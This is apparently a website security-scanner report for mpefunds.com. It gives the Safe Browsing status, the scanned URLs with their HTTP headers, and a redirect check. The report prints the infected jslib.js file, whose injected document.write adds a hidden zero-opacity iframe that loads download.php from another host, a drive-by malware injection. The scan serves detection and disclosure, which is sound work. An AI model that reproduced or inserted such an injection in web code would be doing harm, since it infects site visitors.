Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mpefunds.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://mpefunds.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 11 Jan 2015 14:02:37 GMT Location: /cms/view.php Server: Apache/1.3.404 (Unix) mod_macro/1.1.2 PHP/3.0.18 mod_fastcgi/2.4.6 Content-Type: text/html | clean |
http://mpefunds.com/cms/view.php | 200 OK Content-Length: 10071 Content-Type: text/html | clean |
http://mpefunds.com/includes/js/jslib.js | 200 OK Content-Length: 1762 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function open_win(t,x,y) { if ((t) && (t != null)) { pWindow = open(t,"np","width="+x+",height="+y+",menubar=no,scrollbars=no,resizable=yes"); pWindow.focus(); } } function go(url) { if (url.charAt(0) == '/') location.href = url; else location.href = url; } function visibleclick(id) { if (document.getElementById(id).style.display=='none') document.getElementById(id).style.di document.getElementById(id).style.display=''; } else { document.getElementById(id).style.display='none'; } return null; } document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://stjohnsdryden.org/img/common/download.php"></iframe></div>'); Antivirus reports:
| ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://mpefunds.com/cms/view.php?id=1 | 200 OK Content-Length: 10071 Content-Type: text/html | clean |
http://mpefunds.com/account/forgotten_password.php | 200 OK Content-Length: 8981 Content-Type: text/html | clean |
http://mpefunds.com/account/login.php | 200 OK Content-Length: 9453 Content-Type: text/html | clean |
http://mpefunds.com/account/register.php | 200 OK Content-Length: 23770 Content-Type: text/html | clean |
http://mpefunds.com/test404page.js | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://mpefunds.com/cms/?id=300 | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 11 Jan 2015 14:02:43 GMT Pragma: no-cache Location: / Server: Apache/1.3.404 (Unix) mod_macro/1.1.2 PHP/3.0.18 mod_fastcgi/2.4.6 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=e8iirr0m55bddvrll6mfhda2d0; path=/ | clean |
http://mpefunds.com/?id=300 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 11 Jan 2015 14:02:43 GMT Location: /cms/view.php Server: Apache/1.3.404 (Unix) mod_macro/1.1.2 PHP/3.0.18 mod_fastcgi/2.4.6 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mpefunds.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 11 Jan 2015 14:02:37 GMT
Location: /cms/view.php
Server: Apache/1.3.404 (Unix) mod_macro/1.1.2 PHP/3.0.18 mod_fastcgi/2.4.6
Content-Type: text/html
GET / HTTP/1.1
Host: mpefunds.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 11 Jan 2015 14:02:37 GMT
Location: /cms/view.php
Server: Apache/1.3.404 (Unix) mod_macro/1.1.2 PHP/3.0.18 mod_fastcgi/2.4.6
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: mpefunds.com
Referer: http://www.google.com/search?q=mpefunds.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mpefunds.com
Referer: http://www.google.com/search?q=mpefunds.com
Result:
The result is similar to the first query. There are no suspicious redirects found.